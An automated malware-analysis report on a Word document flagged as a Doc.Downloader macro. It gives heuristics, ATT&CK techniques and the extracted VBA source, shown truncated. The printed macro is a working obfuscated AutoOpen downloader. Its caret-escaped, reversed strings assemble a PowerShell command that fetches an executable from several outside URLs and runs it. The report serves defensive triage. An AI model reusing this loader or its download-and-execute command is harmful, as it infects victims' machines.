Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is a malicious Microsoft Word document containing a VBA macro. The AutoOpen macro is designed to execute a command using the Shell function, indicating it's likely a downloader. The ClamAV detection name 'Doc.Downloader.Emooodldr-6691367-0' strongly suggests the Emooodldr family and its downloader capabilities.
Heuristics (5)

- ClamAV: Doc.Downloader.Emooodldr-6691367-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emooodldr-6691367-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4704 bytes | 6382ead2f5df1b99cda875bc29e7241f813ff1e062ce2086d1fc9ca8f546b9de |

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "bIudFiTnNZGCL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const PMfOj = 0
Dim WEJwN(3)
WEJwN(0) = MidB(wFPYbB, 709, 78)
WEJwN(1) = Left(ZVFIqc, 123)
WEJwN(2) = Mid(QAZRiN, 403, 76)
Dim zjMcm(4)
zjMcm(0) = MidB(wFPYbB, 709, 78)
zjMcm(1) = Right(sKJoAwi, 48)
zjMcm(2) = Mid(QAZRiN, 403, 76)
zjMcm(3) = Mid(QAZRiN, 403, 76)
Dim vkGmP(4)
vkGmP(0) = Mid(QAZRiN, 403, 76)
vkGmP(1) = Right(sKJoAwi, 48)
vkGmP(2) = Right(sKJoAwi, 48)
vkGmP(3) = Mid(QAZRiN, 403, 76)
Shell@ qWSquiG + YGCoDzCWB + zWTVbkTEV, CInt(PMfOj)
Dim kXSolp(3)
kXSolp(0) = Mid(QAZRiN, 403, 76)
kXSolp(1) = MidB(wFPYbB, 709, 78)
kXSolp(2) = Left(ZVFIqc, 123)
Dim GOzEpA(3)
GOzEpA(0) = MidB(wFPYbB, 709, 78)
GOzEpA(1) = Mid(QAZRiN, 403, 76)
GOzEpA(2) = Mid(QAZRiN, 403, 76)
End Sub
Attribute VB_Name = "KRtOEzBhBd"
Function qWSquiG()
Dim wMBOuw(4)
wMBOuw(0) = MidB(wFPYbB, 709, 78)
wMBOuw(1) = MidB(wFPYbB, 709, 78)
wMBOuw(2) = Mid(QAZRiN, 403, 76)
wMBOuw(3) = MidB(wFPYbB, 709, 78)
Dim zjkzL(5)
zjkzL(0) = Mid(QAZRiN, 403, 76)
zjkzL(1) = Left(ZVFIqc, 123)
zjkzL(2) = Right(sKJoAwi, 48)
zjkzL(3) = Right(sKJoAwi, 48)
zjkzL(4) = Left(ZVFIqc, 123)
Dim LPPoO(2)
LPPoO(0) = MidB(wFPYbB, 709, 78)
LPPoO(1) = Right(sKJoAwi, 48)
Dim vTjOHJ(3)
vTjOHJ(0) = Right(sKJoAwi, 48)
vTjOHJ(1) = Right(sKJoAwi, 48)
vTjOHJ(2) = Right(sKJoAwi, 48)
Dim vQoMtF(4)
vQoMtF(0) = Mid(QAZRiN, 403, 76)
vQoMtF(1) = Mid(QAZRiN, 403, 76)
vQoMtF(2) = Mid(QAZRiN, 403, 76)
vQoMtF(3) = Left(ZVFIqc, 123)
LHEEaXi = Format(Chr(0 + 5 + 7 + 15 + 72)) + "md /V^:^ON/" + Format(Chr(0 + 3 + 5 + 10 + 49)) + Format(Chr(0 + 1 + 2 + 4 + 27)) + "s^e^t" + " b^xV^3=^ ^ ^ ^" + " ^ ^ ^ ^ }" + "}^{h" + Format(Chr(0 + 5 + 7 + 15 + 72)) + "^t^a" + Format(Chr(0 + 5 + 7 + 15 + 72)) + "^};ka^erb;^ZG" + "^S^$^ ^me^t^I-^e^" + "kovn^I;)ZGS$^" + " ^,^l^ta" + "$(eli^F^d^a^" + "oln^w^oD^.o^sr${yrt^{)n^" + "DQ$^ ni"
Dim KhKuQF(5)
KhKuQF(0) = Left(ZVFIqc, 123)
KhKuQF(1) = Left(ZVFIqc, 123)
KhKuQF(2) = Right(sKJoAwi, 48)
KhKuQF(3) = Left(ZVFIqc, 123)
KhKuQF(4) = Left(ZVFIqc, 123)
Dim kGikS(4)
kGikS(0) = Right(sKJoAwi, 48)
kGikS(1) = Left(ZVFIqc, 123)
kGikS(2) = Left(ZVFIqc, 123)
kGikS(3) = MidB(wFPYbB, 709, 78)
auRnmzU = " ^lt^a$(h" + Format(Chr(0 + 5 + 7 + 15 + 72)) + "^a^er^o^f;^'ex^e" + "^.'^+V^f^s$^+^'^\'+" + Format(Chr(0 + 5 + 7 + 15 + 72)) + "i" + "^l^bup^:vne^$^=^" + "Z^GS^$^;^'^63^8^' ^= " + "Vf^s^$;)'^@'(t^i^lpS.^'S" + "/^ln^.ej^tn^" + "ee//:^" + "pt^th^@^XQ^xK8A" + Format(Chr(0 + 3 + 5 + 10 + 49)) + "r/^k" + "^u^.o" + Format(Chr(0 + 5 + 7 + 15 + 72)) + "^.m^" + "a^p^s^t^ae//^:^p^t" + "th^@hZ/^m^o" + Format(Chr(0 + 5 + 7 + 15 + 72)) + ".lla^wo^d//^:p^t^"
Dim fEcdnO(5)
fEcdnO(0) = Right(sKJoAwi, 48)
fEcdnO(1) = Right(sKJoAwi, 48)
fEcdnO(2) = Mid(QAZRiN, 403, 76)
fEcdnO(3) = MidB(wFPYbB, 709, 78)
fEcdnO(4) = Right(sKJoAwi, 48)
Dim HBYYjw(3)
HBYYjw(0) = Right(sKJoAwi, 48)
HBYYjw(1) = Mid(QAZRiN, 403, 76)
HBYYjw(2) = MidB(wFPYbB, 709, 78)
Dim OtZhz(4)
OtZhz(0) = MidB(wFPYbB, 709, 78)
OtZhz(1) = Left(ZVFIqc, 123)
OtZhz(2) = Mid(QAZRiN, 403, 76)
OtZhz(3) = Left(ZVFIqc, 123)
Dim jmjhB(2)
jmjhB(0) = Mid(QAZRiN, 403, 76)
jmjhB(1) = Mid(QAZRiN, 403, 76)
XYMwqhmOvq = "t^h@^5g/mo" + Format(Chr(0 + 5 + 7 + 15 + 72)) + "^.rak^a^h^t^d//^:^p^tt^h^@eO/" + "m^o" + Format(Chr(0 + 5 + 7 + 15 + 72)) + ".ralud^o^m^le//^" + ":p^tt^h'^=n^D^Q" + "$;tneil" + Format(Chr(0 + 3 + 5 + 10 + 49)) + "^beW.^t^eN^ t" + Format(Chr(0 + 5 + 7 + 15 + 72)) + "e" + "^j^b^o-^wen=o^sr$^ " + "^l^l^e^h" + "sre^wo^p&&^f^or /^L %^5 ^in" + " (^3^25,^-1^,^0)^d^o s^e^t ^W^" + "X^l=!^W^X^l!!b^xV^3" + ":~%^5,1!"
Dim XvUajt(3)
XvUajt(0) = Right(sKJoAwi, 48)
XvUajt(1) = Left(ZVFIqc, 123)
XvUajt(2) = Right(sKJoAwi, 48)
Dim DMGHb(2)
DMGHb(0) = Mid(QAZRiN, 403, 76)
DMGHb(1) = MidB(wFPYbB, 709, 78)
DYVBo = "&&i^f %^
... (truncated)